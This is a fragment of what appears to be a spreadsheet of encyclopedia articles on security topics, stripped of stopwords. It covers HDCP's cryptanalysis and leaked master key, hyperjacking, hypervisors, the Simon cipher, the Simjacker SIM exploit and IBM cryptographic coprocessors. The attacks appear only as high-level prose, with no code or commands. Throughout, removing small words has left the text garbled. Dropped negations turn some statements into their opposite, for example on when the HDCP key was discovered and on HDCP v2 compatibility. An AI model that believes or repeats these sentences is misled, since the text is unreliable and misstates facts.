strippers decrypt hdcp stream transmit unencrypted hdmi video signal work non-hdcp display. currently unclear whether devices would remain working hdcp licensing body issued key-revocation lists, installed media (e.g. newer blu-ray discs) played-back another device (e.g. blu-ray disc player) connected cryptanalysis 2001, scott crosby carnegie mellon university wrote paper goldberg, robert johnson, dawn song, david wagner called cryptanalysis high-bandwidth digital content protection system", presented acm-ccs8 workshop november.the authors concluded hdcp's linear exchange fundamental weakness, discussed ways eavesdrop data. clone device public key. avoid blacklist devices. create device vectors. aggregate, usurp authority completely.they also said blom's scheme swap could broken so-called conspiracy attack: obtaining keys least devices reconstructing secret symmetrical master matrix used compute them. around time, niels ferguson independently claimed broken hdcp scheme, publish research, citing legal concerns arising controversial digital millennium copyright act.in november 2011 professor güneysu ruhr-universität bochum revealed broken hdcp encryption standard. master release september 2010, engadget reported release possible genuine hdcp master create device keys authenticate hdcp compliant devices without obtaining valid keys digital content protection llc. this master would neutralize revocation feature hdcp, keys created ones revoked. since master known, follows unlicensed hdcp decoding device could simply master dynamically generate keys fly, making revocation impossible. immediately clear discovered discovered though discovery announced twitter update linked pastebin snippet containing instructions engadget said attacker used method proposed crosby 2001 retrieve master key, although cited different researcher. september, intel confirmed code cracked. intel threatened legal action anyone producing hardware circumvent hdcp, possibly digital millennium copyright act. hdcp v2.2, v2.1 v2.0 breach august 2012 version proved broken. attack used fact pairing process sends obfuscated xor. that makes encryptor (receiver) unaware whether encrypts decrypts key. further, input parameters fixed receiver side, meaning transmitter enforce repeating operation. such setting allows attacker monitor pairing protocol, repeat small change extract key. small change pick "random" encrypted previous flow. now, attacker runs protocol pairing message gets e(e(km)). since based undoes itself, thus exposing legitimate device. v2.2 released weakness adding randomness provided receiver side. however transmitter v2.2 must support receivers v2.1 v2.0 order avoid attack. hence erratum released redefine field called "type" prevent backward compatibility versions 2.2. "type" flag requested content's usage rules (i.e. opened content).in august 2015, version rumored broken. episode amc's series breaking leaked internet format; metadata indicated hdmi cap, meaning captured hdmi interface removed hdcp protection.on november 2015, chinese company legendsky tech co., already known hdcp rippers/splitters hdfury brand, released hdfury integral, device remove hdcp hdcp-enabled works. december 2015, warner bros digital content protection, (dcp, owners hdcp) filed lawsuit legendsky. nevertheless, lawsuit ultimately dropped legendsky argued device "strip" hdcp content protection rather downgraded older version, measure explicitly permitted dcp's licensing manual. problems hdcp cause problems users want connect multiple screens device; example, several televisions connected satellite receiver user closed laptop uses external display monitor. hdcp devices create multiple keys, allowing screen operate, number varies device device; e.g., dish satellite receiver generate keys. technology sometimes causes handshaking problems devices cannot establish connection, especially older high-definition displays.edward felten wrote "the main practical effect hdcp create electronics could fail work properly tv," concluded aftermath master fiasco hdcp "less security system tool shaping consumer electronics market."additional issues arise interactive media (i.e. video games) suffer control latency, requires additional processing encoding/decoding. various everyday usage situations, live streaming capture game play, also adversely affected.there also problem apple laptop products, presumably order reduce switching time, confronted hdcp-compliant sink device, automatically enable hdcp encryption hdmi mini displayport usb-c connector port. this problem user wishes recording videoconferencing facilities chain, devices often decrypt hdcp-enabled content (since hdcp meant avoid direct copying content, devices could conceivably exactly that). this applies even output hdcp-requiring content, like powerpoint presentation merely device's some sink devices ability disable hdcp reporting entirely, however, preventing issue blocking content videoconferencing recording. however, hdcp content refuse play many source devices disabled sink device connected.when connecting hdcp source device compatible distribution video wall made multiple legacy displays ability display image guaranteed. versions hdcp v2.x version hdcp continuation hdcpv1, rather completely different link protection. version employs industry-standard encryption algorithms, 128-bit 3072 1024-bit public 256-bit hmac-sha256 hash function. while hdcp v1.x specifications support backward compatibility previous versions specification, hdcpv2 devices interface hdcpv1 hardware natively supporting hdcpv1, using dedicated converter device. this means hdcpv2 applicable technologies. selected wirelesshd miracast (formerly wifi display) standards.hdcp features authentication protocol, locality check ensure receiver relatively close must respond locality check within normal dvi/hdmi link). version specification cryptanalyzed found several flaws, including ability recover session key.there still commonalities hdcp both authority. both share license agreement, compliance rules robustness rules. both share revocation system device formats. also hdcp repeater digital transmission content protection digital rights management encrypted media extensions defective design trusted computing hardware restriction references external links official website</t>
  </si>
  <si>
    <t>HyperCard viruses</t>
  </si>
  <si>
    <t>soon release hypercard 1987, computer viruses appeared targeted application. viruses written hypertalk programming language typically spread infecting home stack infecting stacks there. list viruses references</t>
  </si>
  <si>
    <t>HyperVM</t>
  </si>
  <si>
    <t>hypervm multi-tiered, multi-server, multi-virtualization software product allowing virtual private server (vps) vendor provision, manage delegate xen- openvz-based virtual private servers. hypervm also comes integrated kloxo hosting control panel means that, using hypervm, provider deploy full-fledged hosting system out-of-the-box. hypervm also allows users manage vps' across multiple servers transparently: provides mechanism manage networking configuration address, gateway) control panel itself, full-fledged address pool facilitate large scale management.hypervm tightly integrated kloxo, kloxo functions accessed hypervm without needing kloxo. history july 2009, kloxo hypervm announced open source software. since then, extensively upgraded. some notable features hypervm include: integration whmcs cross datacenter deployment distributed management single console hierarchical client system. web-based graphic user interface openvz virtualization support windows virtualization intelligent handling traffic shaping network management built messaging system hypervmbug also kernel-based virtual machine references</t>
  </si>
  <si>
    <t>Hyperjacking</t>
  </si>
  <si>
    <t>hyperjacking attack hacker takes malicious control hypervisor creates virtual environment within virtual machine (vm) host. point attack target operating system virtual machines attacker's program applications completely oblivious presence. overview hyperjacking involves installing malicious, fake hypervisor manage entire server system. regular security measures ineffective operating system aware machine compromised. hyperjacking, hypervisor specifically operates stealth mode runs beneath machine, makes difficult detect likely gain access computer servers affect operation entire institution company. hacker gains access hypervisor, everything connected server manipulated. hypervisor represents single point failure comes security protection sensitive information.for hyperjacking attack succeed, attacker would take control hypervisor following methods: injecting rogue hypervisor beneath original hypervisor directly obtaining control original hypervisor running rogue hypervisor existing hypervisor mitigation techniques some basic design features virtual environment help mitigate risks hyperjacking: security management hypervisor must kept separate regular traffic. this network related measure hypervisor related. guest operating systems never access hypervisor. management tools installed used guest regularly patching hypervisor. known attacks early 2015, report actual demonstration successful hyperjacking besides "proof concept" testing. venom vulnerability (cve-2015-3456) revealed 2015 potential affect many datacenters. hyperjackings rare difficulty directly accessing hypervisors; however, hyperjacking considered real-world threat. also virtual machine escape references</t>
  </si>
  <si>
    <t>Hypervisor</t>
  </si>
  <si>
    <t>hypervisor computer software, firmware hardware allows partitioning resources among multiple operating systems independent programs. coined term hypervisor 360/65 later used diag handler cp-67. contemporary usage virtual machine monitor (vmm) virtualizer. computer software, firmware hardware creates runs virtual machines. computer hypervisor runs virtual machines called host machine, virtual machine called guest machine. hypervisor presents guest operating systems virtual operating platform manages execution guest operating systems. unlike emulator, guest executes instructions native hardware. multiple instances variety operating systems share virtualized hardware resources: example, linux, windows, macos instances single physical machine. this contrasts operating-system–level virtualization, instances (usually called containers) must share single kernel, though guest operating systems differ user space, different linux distributions kernel. term hypervisor variant supervisor, traditional term kernel operating system: hypervisor supervisor supervisors, hyper- used stronger variant super-. term dates circa 1970; earlier cp/cms (1967) system, term control program used instead. classification 1973 thesis, "architectural principles virtual computer systems," robert goldberg classified types hypervisor: type-1, native bare-metal hypervisors these hypervisors directly host's hardware control hardware manage guest operating systems. reason, sometimes called bare-metal hypervisors. first hypervisors, developed 1960s, native hypervisors. these included test software simmon cp/cms operating system, predecessor z/vm. type-2 hosted hypervisors these hypervisors conventional operating system (os) computer programs virtual machine monitor runs process host. type-2 hypervisors abstract guest operating systems host operating system.the distinction types always clear. instance, bhyve kernel modules effectively convert host operating system type-1 hypervisor. time, since linux distributions freebsd still general-purpose operating systems, applications competing resources, bhyve also categorized type-2 hypervisors. mainframe origins first hypervisors providing full virtualization test tool simmon one-off cp-40 research system, began production january 1967 became first version cp/cms operating system. cp-40 s/360-40 modified cambridge scientific center support dynamic address translation, feature enabled virtualization. prior time, computer hardware virtualized extent allow multiple user applications concurrently, ctss m44/44x. with cp-40, hardware's supervisor state virtualized well, allowing multiple operating systems concurrently separate virtual machine contexts. programmers soon implemented cp-40 cp-67) system/360-67, first production computer system capable full virtualization. shipped machine 1966; included page-translation-table hardware virtual memory techniques allowed full virtualization kernel tasks, including interrupt handling. (note "official" operating system, ill-fated tss/360, employ full virtualization.) both cp-40 cp-67 began production 1967. cp/cms available customers 1968 early 1970s, source code form without support. cp/cms formed part ibm's attempt build robust time-sharing systems mainframe computers. running multiple operating systems concurrently, hypervisor increased system robustness stability: even operating system crashed, others would continue working without interruption. indeed, even allowed beta experimental versions operating systems‍—‌or even hardware‍—‌to deployed debugged, without jeopardizing stable main production system, without requiring costly additional development systems. announced system/370 series 1970 without virtual memory feature needed virtualization, added august 1972 advanced function announcement. virtualization featured successor systems, modern-day mainframes, including zseries line, retain backward compatibility 1960s-era s/360 line. 1972 announcement also included vm/370, reimplementation cp/cms s/370. unlike cp/cms, provided support version (though still distributed source code form several releases). stands virtual machine, emphasizing all, some, hardware interfaces virtualized. both cp/cms enjoyed early acceptance rapid development universities, corporate users, time-sharing vendors, well within ibm. users played active role ongoing development, anticipating trends seen modern open source projects. however, series disputed bitter battles, time-sharing lost batch processing political infighting, remained ibm's "other" mainframe operating system decades, losing mvs. enjoyed resurgence popularity support 2000 z/vm product, example platform linux mentioned above, control program includes hypervisor-call handler intercepts diag ("diagnose", opcode x'83') instructions used within virtual machine. this provides fast-path non-virtualized execution file-system access operations (diag model-dependent privileged instruction, used normal programming, thus virtualized. therefore available signal "host" operating system). when first implemented cp/cms release 3.1, diag provided operating system interface analogous system/360 supervisor call instruction (svc), require altering extending system's virtualization svc. 1985 introduced pr/sm hypervisor manage logical partitions (lpar). operating system support several factors resurgence around 2005 virtualization technology among unix, linux, unix-like operating systems: expanding hardware capabilities, allowing single machine simultaneous work efforts control costs simplify management consolidation servers need control large multiprocessor cluster installations, example server farms render farms improved security, reliability, device independence possible hypervisor architectures ability complex, os-dependent applications different hardware environmentsmajor unix vendors, including ibm, sgi, microsystems, selling virtualized hardware since 2000. these generally large, expensive systems multimillion-dollar range high end), although virtualization also available low- mid-range systems, pseries servers, superdome series machines, sun/oracle t-series coolthreads servers. although solaris always guest domain officially supported sun/oracle logical domains hypervisor, late 2006, linux (ubuntu gentoo), freebsd ported hypervisor (and simultaneously processor, fully virtualized independent guest oses). wind river "carrier grade linux" also runs sun's hypervisor. full virtualization sparc processors proved straightforward: since inception mid-1980s deliberately kept sparc architecture clean artifacts would impeded virtualization. (compare virtualization processors below.)hpe provides integrity virtual machines (integrity host multiple operating systems itanium powered integrity systems. itanium hp-ux, linux, windows openvms, environments also supported virtual servers hp's integrity platform. hp-ux operating system hosts integrity hypervisor layer allows many important features hp-ux taken advantage provides major differentiation platform commodity platforms processor hotswap, memory hotswap, dynamic kernel updates without system reboot. while heavily leverages hp-ux, integrity hypervisor really hybrid runs bare-metal guests executing. running normal hp-ux applications integrity host heavily discouraged, integrity implements memory management, scheduling policies tuned virtual machines effective normal applications. also provides rigid partitioning integrity hp9000 systems vpar npar technology, former offering shared resource partitioning latter offering complete processing isolation. flexibility virtual server environment (vse) given frequently newer deployments.ibm provides virtualization partition technology known logical partitioning (lpar) system/390, zseries, pseries as/400 systems. ibm's power systems, power hypervisor (phyp) native (bare-metal) hypervisor firmware provides isolation lpars. processor capacity provided lpars either dedicated fashion entitlement basis unused capacity harvested re-allocated busy workloads. groups lpars processor capacity managed "pool" refers capability multiple shared-processor pools (mspps) implements servers power6 processor. lpar mspp capacity allocations dynamically changed. memory allocated lpar lpar initiation dynamically) address-controlled power hypervisor. real-mode addressing operating systems (aix, linux, power processors (power4 onwards) designed virtualization capabilities hardware address-offset evaluated address-offset arrive physical memory address. input/output (i/o) adapters exclusively "owned" lpars shared lpars appliance partition known virtual server (vios). power hypervisor provides high levels reliability, availability serviceability (ras) facilitating add/replace many parts (model dependent: processors, memory, adapters, blowers, power units, disks, system controllers, etc.) similar trends occurred x86/x86-64 server platforms, open-source projects virtualization efforts. these include hypervisors built linux solaris kernels well custom kernels. since technologies span large systems desktops, described next section. systems since 2005, vendors added hardware virtualization assistance products; example, intel vt-x (code-named vanderpool) amd-v (code-named pacifica). alternative approach requires modifying guest operating system make system call underlying hypervisor, rather executing machine instructions hypervisor simulates. this called paravirtualization xen, "hypercall" parallels workstation, "diagnose code" some microkernels, mach flexible enough allow paravirtualization guest operating systems. embedded systems embedded hypervisors, targeting embedded systems certain real-time operating system (rtos) environments, designed different requirements compared desktop enterprise systems, including robustness, security real-time capabilities. resource-constrained nature many embedded systems, especially battery-powered mobile systems, imposes requirement small memory-size overhead. finally, contrast ubiquity architecture world, embedded world uses wider variety architectures less standardized environments. support virtualization requires memory protection form memory management unit least memory protection unit) distinction user mode privileged mode, rules microcontrollers. this still leaves x86, mips, powerpc widely deployed architectures medium- high-end embedded systems.as manufacturers embedded systems usually source code operating systems, less need full virtualization space. instead, performance advantages paravirtualization make usually virtualization technology choice. nevertheless, mips recently added full virtualization support option included latest high-end processors architecture versions, cortex-a15 mpcore armv8 el2. other differences virtualization server/desktop embedded environments include requirements efficient sharing resources across virtual machines, high-bandwidth, low-latency inter-vm communication, global view scheduling power management, fine-grained control information flows. security implications hypervisor technology malware rootkits installing hypervisor operating system, known hyperjacking, make difficult detect malware could intercept operations operating system (such someone entering password) without anti-malware software necessarily detecting (since malware runs entire operating system). implementation concept allegedly occurred subvirt laboratory rootkit (developed jointly microsoft university michigan researchers) well blue pill malware package. however, assertions disputed others claim would possible detect presence hypervisor-based rootkit.in 2009, researchers microsoft north carolina state university demonstrated hypervisor-layer anti-rootkit called hooksafe provide generic protection kernel-mode rootkits. notes references external links hypervisors virtual machines: implementation insights architecture performance comparison hypervisors, vmware</t>
  </si>
  <si>
    <t>Simple Protocol for Independent Computing Environments</t>
  </si>
  <si>
    <t>computing, spice (the simple protocol independent computing environments) remote-display system built virtual environments allows users view computing "desktop" environment computer-server machine, also anywhere internet using wide variety machine architectures. qumranet originally developed spice using closed-source codebase 2007. hat, acquired qumranet 2008, december 2009 released code open-source license made protocol open standard. security spice client connection remote desktop server consists multiple data channels, separate unix socket connection. data channel designated operate either clear-text, modes, allowing administrator tradeoff security level performance. mode provides strong encryption traffic transmitted data channel. addition encryption, spice protocol allows choice authentication schemes. original spice protocol defined ticket based authentication scheme using shared secret. server would generate public/private keypair send public client. client would encrypt ticket (password) public send result back server, would decrypt verify ticket. current spice protocol also allows sasl authentication protocol, thus enabling support wide range admin configurable authentication mechanisms, particular kerberos. implementations while server implementation exists, several programmers developed implementations spice client-side since open-sourcing spice. spice-protocol spice-protocol module defines spice wire protocol formats. this made available license, portable across linux windows platforms. spice spice module provides reference implementation server side spice protocol. server provided dynamic library linked application wishing expose spice server. 2013, qemu uses provide spice interface virtual machines. spice codebase available lgpl license. client part spice codebase named spicec removed december 2014. spice-gtk spice-gtk module implements spice client using gobject type system widget toolkit. this comprises low-level library, spice-client-glib, implements client protocol code, high-level widgets provide graphical client capability using gtk. this made available lgplv2+ license, portable across linux, windows platforms. spice-html5 spice-html5 module implements spice client uses javascript intended inside browser supporting html5. while implements spice protocol, cannot talk directly regular spice server. must connect server indirectly websocket proxy. this made available combination gplv3+ lgplv3+ licenses. applications spice protocol originated provide improved remote desktop capabilities fork codebase. qemu/kvm qemu maintainers merged support providing spice remote desktop capabilities qemu virtual machines march 2010. qemu binary links spice-server library provide capability implements paravirtualized framebuffer device enable guest take advantage performance benefits spice protocol offers. guest also regular card, albeit degraded performance compared qxl. xspice x.org server driver framebuffer device includes wrapper script makes possible launch xorg server whose display exported spice protocol. this enables spice remote desktop environment, without requiring qemu/kvm virtualization. virt-viewer virt-viewer program uses spice-gtk client library connect virtual machines using spice, alternative previous support vnc. ovirt spice integrated ovirt private-cloud management software, allowing users connect virtual machines spice. also virtualization remote graphics software references external links official website spice protocol</t>
  </si>
  <si>
    <t>Simple Key-Management for Internet Protocol</t>
  </si>
  <si>
    <t>simple key-management internet protocol skip protocol developed circa 1995 ietf security working group sharing encryption keys. skip photuris evaluated exchange mechanisms ipsec adoption 1998.skip hybrid distribution protocol simple management internet protocols (skip) similar ssl, except establishes long-term once, requires prior communication order establish exchange keys session-by-session basis. therefore, connection setup overhead exists keys values continually generated. skip uses knowledge secret private component destination's public component calculate unique used them. each side's public component defined private component. system, generator prime number used modulus (mod). fixed values known parties. first node called node node public component private component second node called node node public component private component every node's public component distributed form certificate. they connected unsecure network. because node knows private component node public component, components compute unique know. note this shared secret implicit. need communicated explicitly either principal. each principal compute secret based knowledge principal's identity public-key certificate. shared secret computed using well-known diffie-hellman algorithm. this mutually authenticated long-term secret used derive key, denoted skip version kijn skip, number derived ever-increasing counter called counter." note skip, master used directly, hashed together data produce key. derived taking low-order size bits kijn used master key-encrypting provide packet-based encryption authentication. individual packet encrypted authenticated) using randomly generated packet denoted packet turn encrypted using kijn. since kijn cached efficiency, allows traffic (that packet) keys modified rapidly necessary even per-packet basis) without incurring computational overhead public-key operation. furthermore, since keys communicated packets themselves, need incur overhead complexity pseudo-session layer underneath figure shows encrypted packet, using two-step encryption procedure described above. figure encrypted packet when node receives encrypted packet, looks sender's certificate. using receiving node's long-term private key, receiving node compute kijn. using kijn, receiving node decrypt and, therefore, decrypt packet. although packet packet, necessary change every packet. keys changed frequently desired based key-management policies enforced site. zero-message master-key update preceding section describes nodes compute long-term key, kijn. changing requires issuing certificate principal. there desirable reasons updating master key. first minimizes exposure given key-encrypting key, making cryptanalysis difficult. second, updating master prevents reusing compromised traffic keys (kp). should traffic used packet authentication ever compromised (for whatever reason), cannot used send forged traffic since encryption current kijn known. master updated sending counter (say packet increments never decremented. becomes function counter follows: kijn h(kij, pseudo-random function md5. second feature incrementing counter prevents coarse-grained playback traffic. once master keys updated, traffic encrypted authenticated help earlier master keys cannot played back. skip, n-counter increments hour. began zero january 1995, 00:00:00 gmt. summary this appendix discussed ideas essential understanding skip works detail. described sunscreen skip handles keys certificates without examined encryption algorithm operates; listed important services sunscreen skip provides; presented overall view sunscreen skip architecture. references http://docs.oracle.com/cd/e19957-01/805-5743/6j5dvnrfs/index.html</t>
  </si>
  <si>
    <t>Simon (cipher)</t>
  </si>
  <si>
    <t>simon family lightweight block ciphers publicly released national security agency (nsa) june 2013. simon optimized performance hardware implementations, sister algorithm, speck, optimized software implementations.the began working simon speck ciphers 2011. agency anticipated agencies federal government would need cipher would operate well diverse collection internet things devices maintaining acceptable level security. description cipher simon block cipher balanced feistel cipher n-bit word, therefore block length length multiple value therefore, simon cipher implementation denoted simon2n/nm. example, simon64/128 refers cipher operating 64-bit plaintext block uses 128-bit key. block component cipher uniform simon implementations; however, generation logic dependent implementation keys. simon supports following combinations block sizes, sizes number rounds: description schedule {\displaystyle s^{j}} notate left circular shift {\displaystyle bits. schedule mathematically described {\displaystyle k_{i+m}=\left\{{\begin{array}{ll}c\oplus \left(z_{j}\right)_{i}\oplus k_{i}\oplus \left(i\oplus s^{-1}\right)\left(s^{-3}k_{i+1}\right),&amp;m=2\\c\oplus \left(z_{j}\right)_{i}\oplus k_{i}\oplus \left(i\oplus s^{-1}\right)\left(s^{-3}k_{i+2}\right),&amp;m=3\\c\oplus \left(z_{j}\right)_{i}\oplus k_{i}\oplus \left(i\oplus s^{-1}\right)\left(s^{-3}k_{i+3}\oplus k_{i+1}\right),&amp;m=4\\\end{array}}\right.} schedule structure balanced. word count {\displaystyle used determine structure expansion, resulting total width {\displaystyle m*n} word expansion consists right shift, constant sequence, {\displaystyle z_{x}} {\displaystyle z_{x}} operates lowest word round. description constant sequence constant sequence, {\displaystyle z_{x}} created linear feedback shift register (lfsr). logical sequence constants value block sizes. lfsr created 5-bit field. constant operates block round lowest order non-key-dependent entropy schedule. lfsr different logic {\displaystyle z_{x}} sequence; however, initial condition encryption. initial condition lfsr decryption varies round. cryptanalysis designers claim simon, though "lightweight" cipher, designed full security possible block size, standard chosen-plaintext (cpa) chosen-ciphertext (cca) attacks. resistance related-key attacks also stated goal, though less crucial attacks model relevant typical cases.: effort made resist attacks known-key distinguishing attack model, designers evaluate simon hash function.as 2018, successful attack full-round simon variant known. interest simon speck, cryptanalysis papers published them.: typical iterated ciphers, reduced-round variants successfully attacked. best published attacks simon standard attack model (cpa/cca unknown key) differential cryptanalysis attacks; make 70–75% rounds variants, though best attacks marginally faster brute-force.: design team states designing simon, found differential attacks limiting attacks, i.e. type attack makes rounds; number rounds leave security margin similar aes-128's approximately 30%.: 12–13 simon criticized small security margin, i.e. rounds best attacks full cipher, comparison conservative ciphers chacha20. ciphers small security margins likely broken future advances cryptanalysis. simon's design team counters real-world cost unnecessarily large security margins, especially lightweight devices, cryptanalysis design phase allowed number rounds appropriately, targeted aes's security margin.: simon includes round counter schedule. designers state included block slide rotational cryptanalysis attacks.: still, rotational-xor cryptanalysis used find distinguishers reduced-round versions related ciphers like speck. though authors describe standard key-recovery attacks based distinguishers, best distinguishers simon32 simon48 known-key distinguishing attack model certain weak classes make slightly rounds best differential distinguishers. authors said research resource-constrained rotational-xor distinguishers rounds probably possible. designers also state simon designed resist known-key distinguishing attacks (which directly compromise confidentiality ciphers).: designers state cryptanalysis found algorithms weaknesses, security commensurate lengths.: design team says cryptanalysis included linear differential cryptanalysis using standard techniques matsui's algorithm sat/smt solvers, though full list techniques used given.: simon's designers criticized providing details cryptanalysis ciphers.the approved simon128/256 speck128/256 u.s. national security systems, though aes-256 still recommended non-constrained applications. standardization efforts controversies initial attempts standardise simon speck failed meet international organization standardization super-majority required process ciphers adopted. expert delegates several countries including germany, japan israel opposed efforts standardise simon speck ciphers, citing concerns pushing standardisation knowledge exploitable weaknesses ciphers. position based partial evidence weaknesses ciphers, lack clear need standardisation ciphers, nsa's previous involvement creation promotion backdoored dual_ec_drbg cryptographic algorithm.in response concerns, stated security analysis papers world's leading cryptographers support nsa's conclusion algorithms secure affirmed aware cryptanalytic techniques would allow anyone else exploit simon speck. after initial attempts standardise ciphers failed, standardised simon speck working groups. october 2018, simon speck ciphers standardized part rfid interface standard, international standard iso/29167-21 (for simon) international standard iso/29167-22 (for speck), making available commercial entities. also balanced boolean function bent function references</t>
  </si>
  <si>
    <t>Simjacker</t>
  </si>
  <si>
    <t>simjacker cellular software exploit cards discovered adaptivemobile security. countries vulnerable according zdnet. vulnerability exploited primarily mexico, also colombia peru, according wall street journal, used track location mobile phone users without knowledge. history vulnerability discovered reported association coordinated vulnerability disclosure process cathal daid adaptivemobile security 2019. first reported publicly 12th september 2019. technical paper presentation made available virusbulletin conference october 2019. technical information attack works exploiting vulnerability uicc/sim card library called browser. specially formatted binary text message sent victim handset, contains commands executed browser environment uicc. browser environment access subset toolkit commands, attackers used vulnerability instruct uicc request imei location information handset toolkit commands. once obtained uicc instructs handset exfiltrate information attackers within another text message. other types attacks also possible using browser, forcing mobile device open webpage make phone call.the attack differed previously reported card attacks required obtained. simjacker attack require key, card browser library installed binary messages containing browser commands sent victim. simjacker registered common vulnerabilities exposures database cve-2019-16256 cve-2019-16257, association coordinated vulnerability disclosure process cvd-2019-0026 impact vulnerability estimated affect uiccs least mobile operators countries, estimates hundred million billion cards affected. researcher reported probable, conservative estimate high hundreds millions cards globally affected.the vulnerability actively exploited primarily mexico, thousands mobile phone users tracked surveillance company previous years using exploit. mitigation mobile phone users tool srlabs card vulnerable. references external links official website</t>
  </si>
  <si>
    <t>IAIK-JCE</t>
  </si>
  <si>
    <t>iaik-jce java-based cryptographic service provider, developed institute applied information processing communications (iaik) graz university technology. offers support many commonly used cryptographic algorithms, hash functions, message authentication codes, symmetric, asymmetric, stream block encryption. development started 1996 iaik-jce first java-based cryptography providers. written entirely java based design principles oracle's jca/jce. license next commercial license, iaik-jce also obtained freely academic purposes, evaluation open-source development. also java cryptography architecture java cryptography extension external links iaik-jce</t>
  </si>
  <si>
    <t>IAPM (mode)</t>
  </si>
  <si>
    <t>integrity-aware parallelizable mode (iapm) mode operation cryptographic block ciphers. name implies, allows parallel mode operation higher throughput. encryption authentication time creation, iapm first cipher modes provide authentication privacy single pass. earlier authenticated encryption designs, passes would required encrypt, second compute mac.) iapm proposed ipsec.other aead schemes also provide single pass, privacy authentication properties. iapm mostly supplanted galois/counter mode. also mode references</t>
  </si>
  <si>
    <t>IBM 4758</t>
  </si>
  <si>
    <t>4758 cryptographic coprocessor secure cryptoprocessor implemented high-security, tamper resistant, programmable board. specialized cryptographic electronics, microprocessor, memory, random number generator housed within tamper-responding environment provide highly secure subsystem data processing cryptography performed. supplies cryptographic-system implementations, toolkits custom application development: pkcs#11, version 2.01 implementation creates high-security solution application programs developed industry-standard api. common cryptographic architecture implementation provides many functions special interest finance industry base custom processing cryptographic functions added.as june 2005, 4758 discontinued replaced improved, faster model called 4764. references external links cryptocards hack that's running version satan’s computer revisited: security explains flaws puff65537's 4758 teardown teardown 4758 fips-140 level certified</t>
  </si>
  <si>
    <t>IBM 4764</t>
  </si>
  <si>
    <t>4764 cryptographic coprocessor secure cryptoprocessor performs cryptographic operations used application programs communications private transactions associated digital certificates. details each coprocessor includes tamper-responding hardware security module (hsm) provides secure storage storing master keys sensitive data. certified meet fips 140-2 level security requirements. coprocessor supported server platforms including system (mainframe), system system system (linux microsoft windows). system called "crypto express2". applications include financial transactions, bank-to-clearing-house transactions, transactions integrated circuit (chip) based credit cards, general-purpose cryptographic applications using symmetric algorithms, hashing algorithms, public algorithms. operational keys (symmetric private) generated coprocessor saved either keystore file application memory, encrypted master coprocessor. coprocessor identical master keys. june 2005, 4764 superseded 4758 discontinued. december 2011, 4764 discontinued. successor 4764 introduced server platforms 2009 2011: november 2009 system (mainframe), called crypto express3 april 2010 power systems, available feature codes 4807, 4808, 4809 2011 system (pc) servers, called 4765 references external links 4764 description 4764 pci-x cryptographic coprocessor 4765 pci-e cryptographic coprocessor 4764 fips level certificate</t>
  </si>
  <si>
    <t>IBM 4765</t>
  </si>
  <si>
    <t>4765 pcie cryptographic coprocessor hardware security module (hsm) includes secure cryptoprocessor implemented high-security, tamper resistant, programmable pcie board. specialized cryptographic electronics, microprocessor, memory, random number generator housed within tamper-responding environment provide highly secure subsystem data processing cryptography performed. 4765 validated fips 140-2 level highest level certification achievable commercial cryptographic devices. 4765 data sheet describes coprocessor detail. supplies cryptographic-system implementations: pkcs#11 implementation creates high-security solution application programs developed industry-standard api. common cryptographic architecture (cca) implementation provides many functions special interest finance industry, extensive support distributed management, base custom processing cryptographic functions added.toolkits custom application development also available. applications include financial transactions, bank-to-clearing-house transactions, transactions integrated circuit (chip) based credit cards, general-purpose cryptographic applications using symmetric algorithms, hashing algorithms, public algorithms. operational keys (symmetric private) generated coprocessor saved either keystore file application memory, encrypted master coprocessor. coprocessor identical master keys. supported systems supports 4765 power systems, ibm-approved servers (linux microsoft windows). crypto express4s (cex4s) crypto express3c (cex3c) feature code 0865 power systems: feature codes ej27, ej28, ej29 x86: machine type-model 4765-001 history 2011, 4765 superseded 4764 discontinued. 4765 discontinued platforms. successor 4765, 4767, introduced server platforms: called crypto express5s available feature code 0890 power systems, available feature codes ej32 ej33 servers, called 4767-002 references external links these links point various relevant cryptographic standards. 13491 secure cryptographic devices: https://www.iso.org/standard/61137.html 9564 security: https://www.iso.org/standard/68669.html ansi x9.24 part management using symmetric techniques: https://webstore.ansi.org/recorddetail.aspx?sku=ansi+x9.24-1-2017 ansi x9.24 part management using asymmetric techniques: https://webstore.ansi.org/recorddetail.aspx?sku=ansi+x9.24-2-2016 fips 140-2: https://nvlpubs.nist.gov/nistpubs/fips/nist.fips.140-2.pdf</t>
  </si>
  <si>
    <t>IBM 4767</t>
  </si>
  <si>
    <t>4767 pcie cryptographic coprocessor hardware security module (hsm) includes secure cryptoprocessor implemented high-security, tamper resistant, programmable pcie board. specialized cryptographic electronics, microprocessor, memory, random number generator housed within tamper-responding environment provide highly secure subsystem data processing cryptography performed. sensitive material never exposed outside physical secure boundary clear format. 4767 validated fips 140-2 level highest level certification achievable commercial cryptographic devices. 4767 data sheet describes coprocessor detail. supplies cryptographic-system implementations: pkcs#11 implementation creates high-security solution application programs developed industry-standard api. common cryptographic architecture (cca) implementation provides many functions special interest finance industry, extensive support distributed management, base custom processing cryptographic functions added.toolkits custom application development also available. applications include financial transactions, bank-to-clearing-house transactions, transactions integrated circuit (chip) based credit cards, general-purpose cryptographic applications using symmetric algorithms, hashing algorithms, public algorithms. operational keys (symmetric private) generated coprocessor saved either keystore file application memory, encrypted master coprocessor. coprocessor identical master keys. performance benefits include incorporation elliptic curve cryptography (ecc) format preserving encryption (fpe) hardware. supported systems supports 4767 certain power systems, servers (linux microsoft windows). crypto express5s (cex5s) feature code 0890 power systems: feature codes ej32 ej33 x86: machine type-model 4767-002 history april 2016, 4767 superseded 4765 discontinued. 4767 supported platforms listed above. successor 4767, 4768, introduced called crypto express6s (cex6s) available feature code 0893. references external links these links point various relevant cryptographic standards. 13491 secure cryptographic devices: https://www.iso.org/standard/61137.html 9564 security: https://www.iso.org/standard/68669.html ansi x9.24 part management using symmetric techniques: https://webstore.ansi.org/recorddetail.aspx?sku=ansi+x9.24-1-2017 ansi x9.24 part management using asymmetric techniques: https://webstore.ansi.org/recorddetail.aspx?sku=ansi+x9.24-2-2016 fips 140-2: https://nvlpubs.nist.gov/nistpubs/fips/nist.fips.140-2.pdf</t>
  </si>
  <si>
    <t>IBM 4768</t>
  </si>
  <si>
